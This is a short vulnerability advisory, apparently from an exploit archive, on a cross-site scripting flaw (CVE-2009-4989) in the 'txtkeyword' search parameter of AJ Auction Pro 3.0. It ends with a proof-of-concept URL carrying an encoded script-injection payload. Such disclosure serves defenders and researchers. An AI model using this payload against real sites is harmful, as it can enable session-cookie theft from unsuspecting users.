AJ Auction Pro 3.0 - 'txtkeyword' Cross-Site Scripting

Related Vulnerabilities: CVE-2009-4989  
Publish Date: 05 Aug 2009
Author: 599eme Man
                source: http://www.securityfocus.com/bid/35968/info

AJ Auction Pro is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

AJ Auction Pro 3.0 is vulnerable; other versions may also be affected. 

http://www.example.com/index.php?do=search&type=&stime=&txtkeyword=%27%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3CMARQUEE+BGCOLOR%3D%22RED%22%3E%3CH1%3EXss%3C%2FH1%3E%3C%2FMARQUEE%3E&id=all&button=Search&select2=all&select3=endsoon